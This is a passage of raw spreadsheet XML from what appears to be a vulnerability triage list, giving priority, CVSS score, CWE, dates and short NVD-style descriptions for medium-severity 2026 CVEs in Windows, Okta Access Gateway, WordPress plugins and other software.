s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69373</t></is></c></row><row r="1051"><c r="A1051" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1051" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1051" s="5" t="inlineStr"><is><t>CVE-2026-69449</t></is></c><c r="D1051" s="5" t="n"><v>6.7</v></c><c r="E1051" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1051" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1051" s="5" t="inlineStr" /><c r="H1051" s="5" t="n"><v>0.004</v></c><c r="I1051" s="5" t="inlineStr" /><c r="J1051" s="5" t="inlineStr" /><c r="K1051" s="5" t="inlineStr" /><c r="L1051" s="5" t="inlineStr" /><c r="M1051" s="5" t="inlineStr" /><c r="N1051" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1051" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1051" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1051" s="5" t="inlineStr" /><c r="R1051" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1051" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows BitLocker allows an authorized attacker to execute code locally.</t></is></c><c r="T1051" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69449</t></is></c></row><row r="1052"><c r="A1052" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1052" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1052" s="5" t="inlineStr"><is><t>CVE-2026-69820</t></is></c><c r="D1052" s="5" t="n"><v>6.7</v></c><c r="E1052" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1052" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1052" s="5" t="inlineStr" /><c r="H1052" s="5" t="n"><v>0.003</v></c><c r="I1052" s="5" t="inlineStr" /><c r="J1052" s="5" t="inlineStr" /><c r="K1052" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1052" s="5" t="inlineStr" /><c r="M1052" s="5" t="inlineStr" /><c r="N1052" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1052" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1052" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1052" s="5" t="inlineStr" /><c r="R1052" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1052" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1052" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69820</t></is></c></row><row r="1053"><c r="A1053" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1053" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1053" s="5" t="inlineStr"><is><t>CVE-2026-71339</t></is></c><c r="D1053" s="5" t="n"><v>6.7</v></c><c r="E1053" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1053" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1053" s="5" t="inlineStr" /><c r="H1053" s="5" t="n"><v>0.003</v></c><c r="I1053" s="5" t="inlineStr" /><c r="J1053" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K105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53" s="5" t="inlineStr" /><c r="M1053" s="5" t="inlineStr" /><c r="N1053" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1053" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1053" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1053" s="5" t="inlineStr" /><c r="R1053" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1053" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1053" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71339</t></is></c></row><row r="1054"><c r="A1054" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1054" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1054" s="5" t="inlineStr"><is><t>CVE-2026-72927</t></is></c><c r="D1054" s="5" t="n"><v>6.7</v></c><c r="E1054" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1054" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1054" s="5" t="inlineStr" /><c r="H1054" s="5" t="n"><v>0.003</v></c><c r="I1054" s="5" t="inlineStr" /><c r="J1054" s="5" t="inlineStr" /><c r="K1054" s="5" t="inlineStr" /><c r="L1054" s="5" t="inlineStr" /><c r="M1054" s="5" t="inlineStr" /><c r="N1054" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1054" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1054" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1054" s="5" t="inlineStr" /><c r="R1054" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1054" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Winsock allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1054" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72927</t></is></c></row><row r="1055"><c r="A1055" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1055" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1055" s="5" t="inlineStr"><is><t>CVE-2026-72935</t></is></c><c r="D1055" s="5" t="n"><v>6.7</v></c><c r="E1055" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1055" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1055" s="5" t="inlineStr" /><c r="H1055" s="5" t="n"><v>0.003</v></c><c r="I1055" s="5" t="inlineStr" /><c r="J1055" s="5" t="inlineStr" /><c r="K1055" s="5" t="inlineStr" /><c r="L1055" s="5" t="inlineStr" /><c r="M1055" s="5" t="inlineStr" /><c r="N1055" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1055" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1055" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1055" s="5" t="inlineStr" /><c r="R1055" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1055" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1055" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72935</t></is></c></row><row r="1056"><c r="A1056" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1056" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1056" s="5" t="inlineStr"><is><t>CVE-2026-72948</t></is></c><c r="D1056" s="5" t="n"><v>6.7</v></c><c r="E1056" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1056" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1056" s="5" t="inlineStr" /><c r="H1056" s="5" t="n"><v>0.004</v></c><c r="I1056" s="5" t="inlineStr" /><c r="J1056" s="5" t="inlineStr" /><c r="K1056" s="5" t="inlineStr" /><c r="L1056" s="5" t="inlineStr" /><c r="M1056" s="5" t="inlineStr" /><c r="N1056" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1056" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1056" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1056" s="5" t="inlineStr" /><c r="R1056" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="S1056" s="5" t="inlineStr"><is><t>Relative path traversal in Windows DNS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1056" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72948</t></is></c></row><row r="1057"><c r="A1057" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1057" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1057" s="5" t="inlineStr"><is><t>CVE-2026-78625</t></is></c><c r="D1057" s="5" t="n"><v>6.7</v></c><c r="E1057" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1057" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1057" s="5" t="inlineStr" /><c r="H1057" s="5" t="n"><v>0.002</v></c><c r="I1057" s="5" t="inlineStr" /><c r="J1057" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1057" s="5" t="inlineStr" /><c r="L1057" s="5" t="inlineStr" /><c r="M1057" s="5" t="inlineStr" /><c r="N1057" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1057" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1057" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1057" s="5" t="inlineStr" /><c r="R1057" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S1057" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not sanitize dashboard label values before writing them into generated PHP configuration files. The generated file is automatically included during authentication requests, resulting in execution with the privileges of the web server process.</t></is></c><c r="T1057" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78625</t></is></c></row><row r="1058"><c r="A1058" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1058" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1058" s="5" t="inlineStr"><is><t>CVE-2026-78630</t></is></c><c r="D1058" s="5" t="n"><v>6.7</v></c><c r="E1058" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1058" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1058" s="5" t="inlineStr" /><c r="H1058" s="5" t="n"><v>0.002</v></c><c r="I1058" s="5" t="inlineStr" /><c r="J1058" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1058" s="5" t="inlineStr" /><c r="L1058" s="5" t="inlineStr" /><c r="M1058" s="5" t="inlineStr" /><c r="N1058" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1058" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1058" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1058" s="5" t="inlineStr" /><c r="R1058" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S1058" s="5" t="inlineStr"><is><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is></c><c r="T1058" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78630</t></is></c></row><row r="1059"><c r="A1059" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1059" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1059" s="5" t="inlineStr"><is><t>CVE-2026-85981</t></is></c><c r="D1059" s="5" t="n"><v>6.7</v></c><c r="E1059" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1059" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1059" s="5" t="inlineStr" /><c r="H1059" s="5" t="n"><v>0.001</v></c><c r="I1059" s="5" t="inlineStr" /><c r="J1059" s="5" t="inlineStr" /><c r="K1059" s="5" t="inlineStr" /><c r="L1059" s="5" t="inlineStr" /><c r="M1059" s="5" t="inlineStr" /><c r="N1059" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1059" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1059" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1059" s="5" t="inlineStr" /><c r="R1059" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1059" s="5" t="inlineStr"><is><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is></c><c r="T1059" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85981</t></is></c></row><row r="1060"><c r="A1060" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1060" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1060" s="5" t="inlineStr"><is><t>CVE-2026-52486</t></is></c><c r="D1060" s="5" t="n"><v>6.6</v></c><c r="E1060" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1060" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1060" s="5" t="inlineStr" /><c r="H1060" s="5" t="n"><v>0.001</v></c><c r="I1060" s="5" t="inlineStr" /><c r="J1060" s="5" t="inlineStr" /><c r="K1060" s="5" t="inlineStr" /><c r="L1060" s="5" t="inlineStr" /><c r="M1060" s="5" t="inlineStr" /><c r="N1060" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1060" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1060" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1060" s="5" t="inlineStr" /><c r="R1060" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S1060" s="5" t="inlineStr"><is><t>An issue in OpenDDS 3.33.x allows a local attacker to cause a denial of service via the verify function in the SIgnedDocument module</t></is></c><c r="T1060" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52486</t></is></c></row><row r="1061"><c r="A1061" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1061" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1061" s="5" t="inlineStr"><is><t>CVE-2026-69469</t></is></c><c r="D1061" s="5" t="n"><v>6.6</v></c><c r="E1061" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1061" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1061" s="5" t="inlineStr" /><c r="H1061" s="5" t="n"><v>0.004</v></c><c r="I1061" s="5" t="inlineStr" /><c r="J1061" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K106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61" s="5" t="inlineStr" /><c r="M1061" s="5" t="inlineStr" /><c r="N1061" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1061" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1061" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1061" s="5" t="inlineStr" /><c r="R1061" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S1061" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1061" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69469</t></is></c></row><row r="1062"><c r="A1062" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1062" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1062" s="5" t="inlineStr"><is><t>CVE-2026-78545</t></is></c><c r="D1062" s="5" t="n"><v>6.6</v></c><c r="E1062" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1062" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1062" s="5" t="inlineStr" /><c r="H1062" s="5" t="n"><v>0.004</v></c><c r="I1062" s="5" t="inlineStr" /><c r="J1062" s="5" t="inlineStr"><is><t>nginx, okta</t></is></c><c r="K1062" s="5" t="inlineStr" /><c r="L1062" s="5" t="inlineStr" /><c r="M1062" s="5" t="inlineStr" /><c r="N1062" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1062" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1062" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1062" s="5" t="inlineStr" /><c r="R1062" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S1062" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not sanitize the application label field before including it in the generated nginx configuration file. The unsanitized value is interpolated into an nginx server block directive, resulting in execution of injected directives.</t></is></c><c r="T1062" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78545</t></is></c></row><row r="1063"><c r="A1063" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1063" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1063" s="5" t="inlineStr"><is><t>CVE-2026-78550</t></is></c><c r="D1063" s="5" t="n"><v>6.6</v></c><c r="E1063" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1063" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1063" s="5" t="inlineStr" /><c r="H1063" s="5" t="n"><v>0.004</v></c><c r="I1063" s="5" t="inlineStr" /><c r="J1063" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1063" s="5" t="inlineStr" /><c r="L1063" s="5" t="inlineStr" /><c r="M1063" s="5" t="inlineStr" /><c r="N1063" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1063" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1063" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1063" s="5" t="inlineStr" /><c r="R1063" s="5" t="inlineStr"><is><t>CWE-95</t></is></c><c r="S1063" s="5" t="inlineStr"><is><t>The Okta Access Gateway management console passes user-supplied input to eval() without sanitization during an authenticated administrator SSH session. As a result, the unsanitized input is executed directly, leading to code execution with the privileges of the management console.</t></is></c><c r="T1063" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78550</t></is></c></row><row r="1064"><c r="A1064" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1064" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1064" s="5" t="inlineStr"><is><t>CVE-2026-17509</t></is></c><c r="D1064" s="5" t="n"><v>6.5</v></c><c r="E1064" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1064" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1064" s="5" t="inlineStr" /><c r="H1064" s="5" t="n"><v>0.002</v></c><c r="I1064" s="5" t="inlineStr" /><c r="J1064" s="5" t="inlineStr" /><c r="K1064" s="5" t="inlineStr" /><c r="L1064" s="5" t="inlineStr" /><c r="M1064" s="5" t="inlineStr" /><c r="N1064" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1064" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1064" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1064" s="5" t="inlineStr" /><c r="R1064" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S1064" s="5" t="inlineStr"><is><t>The WPML Multilingual CMS plugin for WordPress is vulnerable to time-based SQL Injection via the ‘elementIds’ parameter in all versions up to, and including, 4.9.5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vulnerability is exploitable due to an authorization bypass where the registered authorization callback fails to execute, allowing any authenticated user regardless of role to access administrative translation functionalities.</t></is></c><c r="T1064" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-17509</t></is></c></row><row r="1065"><c r="A1065" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1065" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1065" s="5" t="inlineStr"><is><t>CVE-2026-18021</t></is></c><c r="D1065" s="5" t="n"><v>6.5</v></c><c r="E1065" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1065" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1065" s="5" t="inlineStr" /><c r="H1065" s="5" t="n"><v>0.003</v></c><c r="I1065" s="5" t="inlineStr" /><c r="J1065" s="5" t="inlineStr" /><c r="K1065" s="5" t="inlineStr" /><c r="L1065" s="5" t="inlineStr" /><c r="M1065" s="5" t="inlineStr" /><c r="N1065" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1065" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1065" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1065" s="5" t="inlineStr" /><c r="R1065" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S1065" s="5" t="inlineStr"><is><t>The The Beaver Builder Page Builder – Drag and Drop Website Builder plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.10.3.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.</t></is></c><c r="T1065" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18021</t></is></c></row><row r="1066"><c r="A1066" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1066" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1066" s="5" t="inlineStr"><is><t>CVE-2026-44766</t></is></c><c r="D1066" s="5" t="n"><v>6.5</v></c><c r="E1066" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1066" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1066" s="5" t="inlineStr" /><c r="H1066" s="5" t="n"><v>0.002</v></c><c r="I1066" s="5" t="inlineStr" /><c r="J1066" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1066" s="5" t="inlineStr" /><c r="L1066" s="5" t="inlineStr" /><c r="M1066" s="5" t="inlineStr" /><c r="N1066" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1066" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1066" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1066" s="5" t="inlineStr" /><c r="R1066" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S1066" s="5" t="inlineStr"><is><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is></c><c r="T1066" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-44766</t></is></c></row><row r="1067"><c r="A1067" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1067" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1067" s="5" t="inlineStr"><is><t>CVE-2026-53637</t></is></c><c r="D1067" s="5" t="n"><v>6.5</v></c><c r="E1067" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1067" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1067" s="5" t="inlineStr" /><c r="H1067" s="5" t="n"><v>0.003</v></c><c r="I1067" s="5" t="inlineStr" /><c r="J1067" s="5" t="inlineStr" /><c r="K1067" s="5" t="inlineStr" /><c r="L1067" s="5" t="inlineStr" /><c r="M1067" s="5" t="inlineStr" /><c r="N1067" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1067" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1067" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1067" s="5" t="inlineStr" /><c r="R1067" s="5" t="inlineStr"><is><t>CWE-672, CWE-841</t></is></c><c r="S1067" s="5" t="inlineStr"><is><t>Sylius is an Open Source eCommerce Framework on Symfony. Versions 2.0.0 through 2.0.17, 2.1.0 through 2.1.14, and 2.2.0 through 2.2.5 contain an improper workflow enforcement vulnerability in the cart `FormComponent`. When an order is completed while its cart page remains open, the stale LiveComponent does not detect the order’s changed state and continues to permit cart actions, allowing an authenticated customer to modify or permanently delete an already completed order. Versions 2.0.18, 2.1.15, and 2.2.6 contain a patch. As a workaround, deployments can copy the patched `FormComponent` into the application's `src/` directory and override the `sylius_shop.twig.component.cart.form` service definition to use that class.</t></is></c><c r="T1067" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53637</t></is></c></row><row r="1068"><c r="A1068" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1068" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1068" s="5" t="inlineStr"><is><t>CVE-2026-55256</t></is></c><c r="D1068" s="5" t="n"><v>6.5</v></c><c r="E1068" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1068" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1068" s="5" t="inlineStr" /><c r="H1068" s="5" t="n"><v>0.003</v></c><c r="I1068" s="5" t="inlineStr" /><c r="J1068" s="5" t="inlineStr" /><c r="K1068" s="5" t="inlineStr" /><c r="L1068" s="5" t="inlineStr" /><c r="M1068" s="5" t="inlineStr" /><c r="N1068" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1068" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1068" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1068" s="5" t="inlineStr" /><c r="R1068" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S1068" s="5" t="inlineStr"><is><t>In parsePartHeaders of multiple files, there is a possible persistent denial of service due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1068" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55256</t></is></c></row><row r="1069"><c r="A1069" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1069" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1069" s="5" t="inlineStr"><is><t>CVE-2026-58649</t></is></c><c r="D1069" s="5" t="n"><v>6.5</v></c><c r="E1069" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1069" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1069" s="5" t="inlineStr" /><c r="H1069" s="5" t="n"><v>0.003</v></c><c r="I1069" s="5" t="inlineStr" /><c r="J1069" s="5" t="inlineStr" /><c r="K1069" s="5" t="inlineStr" /><c r="L1069" s="5" t="inlineStr" /><c r="M1069" s="5" t="inlineStr" /><c r="N1069" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1069" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1069" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1069" s="5" t="inlineStr" /><c r="R1069" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="S1069" s="5" t="inlineStr"><is><t>Origin validation error in .NET allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1069" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58649</t></is></c></row><row r="1070"><c r="A1070" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1070" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1070" s="5" t="inlineStr"><is><t>CVE-2026-62437</t></is></c><c r="D1070" s="5" t="n"><v>6.5</v></c><c r="E1070" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1070" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1070" s="5" t="inlineStr" /><c r="H1070" s="5" t="n"><v>0.001</v></c><c r="I1070" s="5" t="inlineStr" /><c r="J1070" s="5" t="inlineStr" /><c r="K1070" s="5" t="inlineStr" /><c r="L1070" s="5" t="inlineStr" /><c r="M1070" s="5" t="inlineStr" /><c r="N1070" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1070" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1070" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1070" s="5" t="inlineStr" /><c r="R1070" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S1070" s="5" t="inlineStr"><is><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is></c><c r="T1070" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62437</t></is></c></row><row r="1071"><c r="A1071" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1071" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1071" s="5" t="inlineStr"><is><t>CVE-2026-62762</t></is></c><c r="D1071" s="5" t="n"><v>6.5</v></c><c r="E1071" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1071" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1071" s="5" t="inlineStr" /><c r="H1071" s="5" t="n"><v>0.008</v></c><c r="I1071" s="5" t="inlineStr" /><c r="J1071" s="5" t="inlineStr" /><c r="K1071" s="5" t="inlineStr" /><c r="L1071" s="5" t="inlineStr" /><c r="M1071" s="5" t="inlineStr" /><c r="N1071" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1071" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1071" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1071" s="5" t="inlineStr" /><c r="R1071" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1071" s="5" t="inlineStr"><is><t>Null pointer dereference in Active Directory Domain Services allows an authorized attacker to deny service over a network.</t></is></c><c r="T1071" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62762</t></is></c></row><row r="1072"><c r="A1072" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1072" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1072" s="5" t="inlineStr"><is><t>CVE-2026-62801</t></is></c><c r="D1072" s="5" t="n"><v>6.5</v></c><c r="E1072" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1072" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1072" s="5" t="inlineStr" 